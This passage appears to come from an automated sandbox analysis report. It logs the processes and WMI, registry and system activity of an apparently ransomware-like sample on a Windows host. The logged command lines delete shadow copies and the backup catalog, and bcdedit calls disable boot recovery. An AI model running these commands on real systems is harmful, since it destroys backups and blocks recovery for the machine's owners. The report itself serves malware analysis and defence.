Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x DDC 0x F70 0x EE8 0x 15C 0x AF0

Host Behavior

COM (7)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	F6D90F12-9C73-11D3-B32E-00C04F990BB4	2933BF95-7B36-11D2-B20E-00C04F983E60	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	EB87E1BD-3233-11D2-AEC9-00C04FB68820	EB87E1BC-3233-11D2-AEC9-00C04FB68820	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = root\cli\ms_409	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = \\NQDPDE\ROOT\CIMV2	1	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy	1	Fn

Registry (5)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging, data = 48	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory, data = 37	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Log File Max Size, data = 54	1	Fn

Module (1)

Operation	Module	Additional Information	Success	Count	Logfile
Get Handle	c:\windows\system32\wbem\wmic.exe	base_address = 0x7ff678cf0000		1	Fn

System (3)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = NQDPDE	1	Fn
Get Time	type = Local Time, time = 2019-05-23 22:40:07 (Local Time)	1	Fn
Get Info	type = System Directory, result_out = C:\WINDOWS\system32	1	Fn

Process #11: wbadmin.exe

Information	Value
ID	#11
File Name	c:\windows\system32\wbadmin.exe
Command Line	wbadmin delete catalog -quiet
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:52, Reason: Child Process
Unmonitor	End Time: 00:01:47, Reason: Self Terminated
Monitor Duration	00:00:54
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xdb0
Parent PID	0x654 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x D94 0x CBC 0x 4A4 0x FC4 0x E98

Process #12: vssadmin.exe

Information	Value
ID	#12
File Name	c:\windows\system32\vssadmin.exe
Command Line	vssadmin.exe delete shadows /all /quiet
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:52, Reason: Child Process
Unmonitor	End Time: 00:01:02, Reason: Self Terminated
Monitor Duration	00:00:09
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xdec
Parent PID	0xcdc (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 7EC 0x EFC 0x E88 0x B60 0x F5C

Process #13: bcdedit.exe

Information	Value
ID	#13
File Name	c:\windows\system32\bcdedit.exe
Command Line	bcdedit /set {default} recoveryenabled no
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:52, Reason: Child Process
Unmonitor	End Time: 00:00:55, Reason: Self Terminated
Monitor Duration	00:00:02
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x344
Parent PID	0x770 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F30 0x EF4

Process #14: bcdedit.exe

Information	Value
ID	#14
File Name	c:\windows\system32\bcdedit.exe
Command Line	bcdedit /set {default} bootstatuspolicy ignoreallfailures
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:00:52, Reason: Child Process
Unmonitor	End Time: 00:00:55, Reason: Self Terminated
Monitor Duration	00:00:02
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x540
Parent PID	0xf04 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F98 0x FB0

Remarks (1/1)

Monitored Processes

Behavior Information - Grouped by Category

Before

After